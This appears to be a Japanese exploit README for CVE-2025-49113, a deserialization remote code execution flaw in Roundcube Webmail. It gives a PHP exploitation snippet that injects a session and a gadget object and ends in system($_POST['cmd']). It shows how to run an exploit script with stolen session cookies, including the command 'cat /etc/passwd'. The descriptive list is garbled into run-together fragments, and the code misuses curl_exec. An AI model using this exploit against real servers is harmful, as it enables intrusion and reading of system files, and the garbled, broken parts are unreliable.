
CVE-2025-49113 - Roundcube リモートコード実行
CVE-2025-49113 は、Roundcube Webmail における深刻な安全でない逆シリアル化の脆弱性であり、認証済みリモートコード実行を可能にします。この脆弱性は、ファイルアップロード操作時におけるシリアル化された PHP オブジェクトの不適切な処理に起因します。
program/steps/mail/attach.inc に存在_file パラメータのメタデータを処理_form パラメータによる PHP セッションインジェクションfilename パラメータによる悪意のあるオブジェクトインジェクション_form パラメータを介してセッション操作を注入system() 関数を利用// Simplified exploitation flow
$target_url = $base_url . "?_task=mail&_action=upload&_form=injected_session_data";
$post_data = [
'_file' => '{"name":"malicious_object_gadget","path":"..."}',
'file' => curl_file_create('fake.png', 'image/png', 'exploit.png')
];
$response = curl_exec($target_url, $post_data);
// Vulnerable deserialization occurs in attach.inc processing
// Gadget chain triggers command execution: system($_POST['cmd']);
php CVE-2025-49113-exploit_cookies.php <url> <cookies> <command>
php CVE-2025-49113-exploit_cookies.php \
https://mail.example.com/roundcube/ \
"roundcube_sessid=abc123; roundcube_sessauth=xyz456" \
"cat /etc/passwd"
この情報は教育目的のみで提供されています。明示的な許可なくシステムに対して不正なテストを行うことは違法です。セキュリティ評価を行う前に必ず適切な承認を得てください。著者および発行元は、この情報の誤用について一切の責任を負いません。
| パラメータ | 説明 | 例 |
|---|
<url> | Roundcube インストールのベース URL | https://mail.example.com/roundcube/ |
<cookies> | 有効なセッションクッキー | roundcube_sessid=abc123; roundcube_sessauth=xyz456 |
<command> | 実行する OS コマンド | id または whoami |